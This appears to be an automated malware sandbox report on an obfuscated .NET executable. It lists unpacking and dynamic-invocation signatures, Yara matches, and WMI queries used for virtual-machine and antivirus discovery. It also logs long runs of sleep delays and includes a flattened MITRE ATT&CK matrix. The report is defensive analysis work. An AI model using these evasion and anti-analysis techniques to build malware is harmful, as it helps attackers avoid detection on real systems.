              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: fIPSLgT0lO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: fIPSLgT0lO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003474000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2931835613.0000000006460000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: fIPSLgT0lO.exe, 00000000.00000002.2928319421.0000000003474000.00000004.00000800.00020000.00000000.sdmp, fIPSLgT0lO.exe, 00000000.00000002.2931835613.0000000006460000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: fIPSLgT0lO.exe, 00000000.00000002.2930276212.0000000005860000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: fIPSLgT0lO.exe, 00000000.00000002.2930276212.0000000005860000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: Ygdagggmo.pdb source: fIPSLgT0lO.exe, fIPSLgT0lO.exe, 00000000.00000002.2930414690.00000000059C0000.00000004.08000000.00040000.00000000.sdmp

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: fIPSLgT0lO.exe, ContextCalculator.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, C5FiG7MxadprkYOHlIn.cs.Net Code: Type.GetTypeFromHandle(Dtf6rkX5XJvWaqKkiKA.tSABXZnQRA(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Dtf6rkX5XJvWaqKkiKA.tSABXZnQRA(16777250)),Type.GetTypeFromHandle(Dtf6rkX5XJvWaqKkiKA.tSABXZnQRA(16777305))})
              .NET source code contains potential unpacker
              Source: fIPSLgT0lO.exe, IterableProxy.cs.Net Code: InterceptFlexibleProxy System.Reflection.Assembly.Load(byte[])
              Source: 0.2.fIPSLgT0lO.exe.6460000.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.fIPSLgT0lO.exe.6460000.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.fIPSLgT0lO.exe.6460000.5.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, vSfttOXonD7iVjA8Uy5.cs.Net Code: EH0AuaZoeb
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, vSfttOXonD7iVjA8Uy5.cs.Net Code: BEVFUck1YU
              Source: 0.2.fIPSLgT0lO.exe.5860000.2.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 0.2.fIPSLgT0lO.exe.5860000.2.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 0.2.fIPSLgT0lO.exe.5860000.2.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 0.2.fIPSLgT0lO.exe.5860000.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 0.2.fIPSLgT0lO.exe.5860000.2.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Yara detected Costura Assembly Loader
              Source: Yara matchFile source: 0.2.fIPSLgT0lO.exe.45b7068.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.fIPSLgT0lO.exe.5b40000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2930871276.0000000005B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2929425687.0000000004532000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2928319421.0000000003391000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: fIPSLgT0lO.exe PID: 3020, type: MEMORYSTR
              Source: fIPSLgT0lO.exeStatic PE information: 0xA90F56EF [Tue Nov 18 04:19:59 2059 UTC]
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_059C3B61 push eax; ret 0_2_059C3B62
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BAE690 push esp; ret 0_2_05BAE691
              Source: fIPSLgT0lO.exeStatic PE information: section name: .text entropy: 7.941976982068131
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, PZxUNRXtLPuRUHRXDJY.csHigh entropy of concatenated method names: 'ukOXUDX4oP', 'XHcXWHIvAi', 'gTjX62MJk9', 'G67Xqg1Khl', 'BeRXLfttGS', 'rEcXkumElZ', 'ylUXTUvh2c', 'DwXX4k0Xf2', 'AP2XwdaP6y', 'mRZXSyubOO'
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, C5FiG7MxadprkYOHlIn.csHigh entropy of concatenated method names: 'AAntVV5RCpbBtULe44a', 'OBogCB5fg3iZ8ln6EK9', 'BkJXgQd0lS', 'vh0ry9Sq2v', 'VS1XMWPKRH', 'gyBXeEKm3U', 'FvDXXgPJMZ', 'GTCXYOPR2D', 'KaaBMdtr83', 'Gg5MpXerBK'
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, vSfttOXonD7iVjA8Uy5.csHigh entropy of concatenated method names: 'poUPL27I0H', 'd7wPkBO6B2', 'I3tPT1w9Jx', 'tkhP4uC9x8', 'SuMPwFxRHu', 'LfwPSeTQ2t', 'ChVPoRS37J', 'qltYKgNmL7', 'eg9Pml20tj', 'E2ePHpJJ7T'
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, iEhjTYrTuTh1IJbo9XZ.csHigh entropy of concatenated method names: 'LbJrotelWK', 'sV13gbibSobTePuaBh2', 'zpsdElist5AeoENTwNQ', 'AOXr0ck9tB', 'bU3HDeihT2ZvcnNeYoI', 'aoQcjJiGFEnLyYWHXB0', 'FUCrwYGrB0', 'kX0rSkggHK', 'oJKywCim5ZXiaFCjygh', 'T22Kf0iHywxiSfQdV4L'
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, zfhNj9d50qVDplTlqh.csHigh entropy of concatenated method names: 'kAPDKAY6r', 'gWTcw7I2s', 'uP59FFnjK', 'ToSadhEDK', 'Oe2CnXq4a', 'LWVnGAMss', 'zeLLnVRAN', 'O5E758lTB', 'drcOTdhZS', 'g7bUqpDpE'
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, eHPAVTmm1DlhKiyHAi.csHigh entropy of concatenated method names: 'TI70sCkR0', 'cs2bjuHc5', 'oeQsTZcOW', 'Pa6JEjTxm', 'b1Nh30piS', 'L7LGyMLgD', 'IlqNny1cS', 'vnwZCBpLX', 'Dj7AFFv4DXmK0NJCkpJ', 'z7W5DEvw1ptQ8e45OW5'
              Source: 0.2.fIPSLgT0lO.exe.59c0000.3.raw.unpack, scoH3kV7vOuUYkZCGj6.csHigh entropy of concatenated method names: 'yBxV00eWlU', 'YkydIxiyE3Ono9LRYRk', 'jFYZhoilaI4LKenLJXY', 'CJUVwMSSVQ', 'LPGVSQGhdc', 'D8vVULKvlb', 'MAbVWi6oM9', 'w2CV65mOEN', 'rc1Vqa8uK5', 'gvrVL7wUfR'
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeMemory allocated: 1970000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeMemory allocated: 3390000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeMemory allocated: 32A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeWindow / User API: threadDelayed 8167Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeWindow / User API: threadDelayed 1688Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep count: 31 > 30Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -28592453314249787s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -59875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 4928Thread sleep count: 8167 > 30Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -59766s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 4928Thread sleep count: 1688 > 30Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -59641s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -59531s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -59422s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -59312s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -59203s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -59094s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -58984s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -58875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -58766s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -58641s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -58516s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -58406s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -58297s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -58158s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -57906s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -57781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -57672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -57559s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -57453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -57344s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -57219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -57109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -57000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -56891s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -56781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -56672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -56563s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -56438s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -56313s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -56203s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -56094s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -55969s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -55859s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -55750s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -55641s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -55447s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -55314s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -55188s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -55078s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -54969s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -54859s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -54750s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -54641s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -54531s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -54422s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -54312s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exe TID: 5816Thread sleep time: -54203s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 59875Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 59766Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 59641Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 59531Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 59422Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 59312Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 59203Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 59094Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 58984Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 58875Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 58766Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 58641Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 58516Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 58406Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 58297Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 58158Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 57906Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 57781Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 57672Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 57559Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 57453Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 57344Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 57219Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 57109Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 57000Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 56891Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 56781Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 56672Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 56563Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 56438Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 56313Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 56203Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 56094Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 55969Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 55859Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 55750Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 55641Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 55447Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 55314Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 55188Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 55078Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 54969Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 54859Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 54750Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 54641Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 54531Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 54422Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 54312Jump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeThread delayed: delay time: 54203Jump to behavior
              Source: fIPSLgT0lO.exe, 00000000.00000002.2931318498.0000000005E40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeCode function: 0_2_05BC2728 LdrInitializeThunk,0_2_05BC2728
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeQueries volume information: C:\Users\user\Desktop\fIPSLgT0lO.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\Desktop\fIPSLgT0lO.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
              Windows Management Instrumentation              		1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		1
              Disable or Modify Tools              		OS Credential Dumping1
              Query Registry              		Remote Services11
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		141
              Virtualization/Sandbox Evasion              		LSASS Memory121
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager141
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
